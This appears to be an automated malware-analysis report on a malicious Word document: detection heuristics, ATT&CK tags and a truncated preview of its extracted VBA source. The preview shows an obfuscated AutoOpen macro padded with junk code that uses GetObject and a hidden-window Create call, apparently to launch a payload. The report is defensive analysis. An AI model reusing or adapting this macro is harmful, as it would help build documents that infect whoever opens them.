MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the GetObject function, which is a common technique for executing arbitrary code. This suggests the macro is designed to download and execute a secondary payload. No specific family could be identified.
Heuristics 7
-
ClamAV: Doc.Malware.Dsfj-6905985-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsfj-6905985-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16199 bytes |
SHA-256: 71a3aad5210ba1f705290334e375c39f8347fa1e6c9ab023920b14bc08a33ec3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "McBABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bwAAQQB"
Attribute VB_Base = "0{083E8E4F-7333-4DE3-975C-87E5BE09DE75}{965B932F-2E98-488C-948A-3A0C546735B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "FAUADQw"
Sub autoopen()
On Error Resume Next
If YADACkA = VADxU_GD Then
jBDB1XA = CVar(qXDokB)
C1GwDAAD = (101205095 + Rnd(so__AB4 * _
Tan(708947359 / Chr(124755860 / CDbl(wQ1xBA) * L_xZ4DDX / CDbl(604135494)))) * 178624750 * _
Atn(556091245 / Oct(503255865) - 207074283 * Int(z_AAA1QB)) * (534873275 - Atn(RACDDA)))
BXADoU = Int(zQBDBxQ - _
MAD_GAZ - 412497414 * Int(603344469))
End If
If ic1AQxBx = LUAQDo Then
LXXQDDUU = CVar(NQABwD)
HcAAQAA = (289389406 + Rnd(jAAAUBXw * _
Tan(652224662 / Chr(31746141 / CDbl(XBADQA) * aAXBAAZ / CDbl(303441909)))) * 662885042 * _
Atn(25240853 / Oct(284925518) - 805380599 * Int(E_ABAAAc)) * (706170682 - Atn(zBZAAUX)))
PDA_GA = Int(dAADGQA1 - _
z_AQBAcA - 257527050 * Int(9699502))
End If
Set zZoAxAUk = GetObject(bwAAQQB.Tag + bwAAQQB.IQ1AGA1Q + bwAAQQB.Tag)
If oZGAD_ = YAQD4AA1 Then
LcU1wDZ = CVar(HAkA1AGo)
i4AQD1 = (79195545 + Rnd(rAAAo_A * _
Tan(158329816 / Chr(548353451 / CDbl(ikUZZC) * NACADXA / CDbl(991010880)))) * 392771888 * _
Atn(225583305 / Oct(609036624) - 996059843 * Int(wAQAAAX)) * (519478883 - Atn(VUQQoA)))
wGAQoZ = Int(W_DCC_A - _
wCDxkw - 736633072 * Int(586596545))
End If
If Uw1AQZA = V1A1AA Then
FBAUCDAA = CVar(awUwUZ)
L4UAQxX_ = (484367768 + Rnd(l4ADQD * _
Tan(679210699 / Chr(59517750 / CDbl(sB1BUAk) * uQ_oA_ / CDbl(269071862)))) * 51720181 * _
Atn(21031964 / Oct(21990879) - 509919029 * Int(cCcZBkCB)) * (720245876 - Atn(WDQUwk1A)))
AAwUx4 = Int(iAUCc1 - _
vAcGAADB - 466987491 * Int(540598761))
End If
If cAoZcA = J1ZQcADk Then
EAUUUD = CVar(hAkAAAA)
sQX1kA4 = (358197078 + Rnd(icAUABQ * _
Tan(153325382 / Chr(514242251 / CDbl(XQCQXA) * zDAZAw / CDbl(359149986)))) * 688224264 * _
Atn(692158750 / Oct(979567079) - 677187710 * Int(LxCABA)) * (380328198 - Atn(NQAUAAwQ)))
rwQAoZc = Int(uBXBxDw - _
GAADAAAX - 855715159 * Int(407982257))
End If
zZoAxAUk.ShowWindow = 738293 - 738293
If w411DAUx = O_1ZXACw Then
JXBDQAA = CVar(OBwA4A)
vU4D_Z = (87960523 + Rnd(loACoD * _
Tan(670751758 / Chr(14397286 / CDbl(oXZABUcD) * GUBQDA / CDbl(825014073)))) * 887450535 * _
Atn(242824506 / Oct(719087240) - 689504271 * Int(mQAGAUw)) * (547162149 - Atn(tADUBQU_)))
iCxAB4AB = Int(tDAAQAUU - _
wQQUcAAG - 244463446 * Int(125662189))
End If
If wAQG_Q = KxUDADk Then
wDAA4ZU = CVar(mAAAAoUk)
kCD_kDQ = (544439065 + Rnd(iAAADwX * _
Tan(523204940 / Chr(394316748 / CDbl(H4Qx_U_) * j1cZ4Q4o / CDbl(285257778)))) * 283448523 * _
Atn(65358154 / Oct(946572829) - 491506286 * Int(qGxGUG)) * (885913497 - Atn(BBDBAG)))
VDUDCA = Int(f1wkA4A - _
KAGAAAAQ - 925752717 * Int(467445725))
End If
If iBQwZXU = MxQxox_ Then
UBAUQA = CVar(wAAUZCx)
VZAxA4w = (106169124 + Rnd(VCAABUA * _
Tan(88096912 / Chr(722804815 / CDbl(CoAkA1Bc) * aA_4C4 / CDbl(248778481)))) * 238025100 * _
Atn(265996728 / Oct(12588907) - 602739977 * Int(D_QQAc)) * (465808297 - Atn(mADAcA)))
UkABAA = Int(tAQB_D - _
fGG_QQxA - 193560848 * Int(204645670))
End If
GetObject(bwAAQQB.Tag + bwAAQQB.QoAcA_ + bwAAQQB.Tag). _
Create bwAAQQB.Tag + bwAAQQB.OUA1wDC + bwAAQQB.Tag + bwAAQQB.RAGC_QU + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.CAZQABBk + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.G1AAUAAA + bwAAQQB.Tag + bwAAQQB.AADA_A + bwAAQQB.Tag, X4AxQU, zZoAxAUk, bwAAQQB.Tag
If r_UQQxAZ = aGA4cBAX Then
tAAA1AoA = CVar(noAZAZc)
GQGUAw = (594065071 + Rnd(jXA1AA * _
Tan(968045264 / Chr(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.